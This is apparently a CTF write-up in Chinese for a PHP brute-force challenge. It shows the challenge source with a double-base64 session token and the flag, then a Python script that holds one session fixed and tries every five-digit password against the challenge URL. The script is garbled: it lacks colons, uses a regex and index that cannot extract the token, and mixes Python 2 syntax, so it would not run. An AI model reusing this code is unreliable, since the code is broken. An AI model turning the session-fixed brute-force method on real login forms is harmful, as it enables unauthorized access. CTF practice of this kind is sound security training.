題目地址：http://www.czlgjbbq.top/GJCTF/brute.php

php原始碼：

<?php
error_reporting(0);
session_start();
if(empty($_COOKIE['f14g']) || empty($_SESSION['token'])){
    $rand_number = rand(10000,99999);
    setcookie('f14g',1);
    $_SESSION['token'] = base64_encode(base64_encode($rand_number));
}
echo "當前session值:".$_SESSION['token'];
?>
    <html>
    <head><title>你能進來嗎？</title></head>
    <body>
    <form action="./brute.php" method="GET">
        <input type="text" name="password" placeholder="請輸入五位數密碼!" value="">
        <input type="hidden" name="check" value="<?php echo $_SESSION['token'];?>">
        <input type="submit" name="submit" value="提交">
    </form>
    </body>
    </html>


<?php
if($_SESSION['token'] == $_GET['check']){
    $password = $_GET['password'];
    echo $password;
    if($password == base64_decode(base64_decode($_SESSION['token']))){
        echo "flag:GJCTF{anjjPONFAkg};";
    }else{
        echo "error!";
    }
}else{
    echo "session error!";
}

?>
 

根據原始碼可以看出我們可以固定session值來避免session值的重新整理從而避免密碼的變更。
所以這裡我們使用python指令碼，並使用requests.session庫來避免session值的重新整理以導致後臺管理員密碼的重新整理。

python指令碼：

import requests
import re
s = requests.session()
html = s.get('http://www.czlgjbbq.top/GJCTF/brute.php')
pattern = '.html'
ss = re.search(pattern, html.text)
session = ss.group()[1-6]
#print session
for i in range(10000,99999)
    payload = {'password' str(i), 'check' session}
    #print payload
    html = s.get(url='http://www.czlgjbbq.top/GJCTF/brute.php', params=payload)
    pattern = 'GJCTF'
    if not re.match(pattern,html.text)
        pass
    else
        print html.text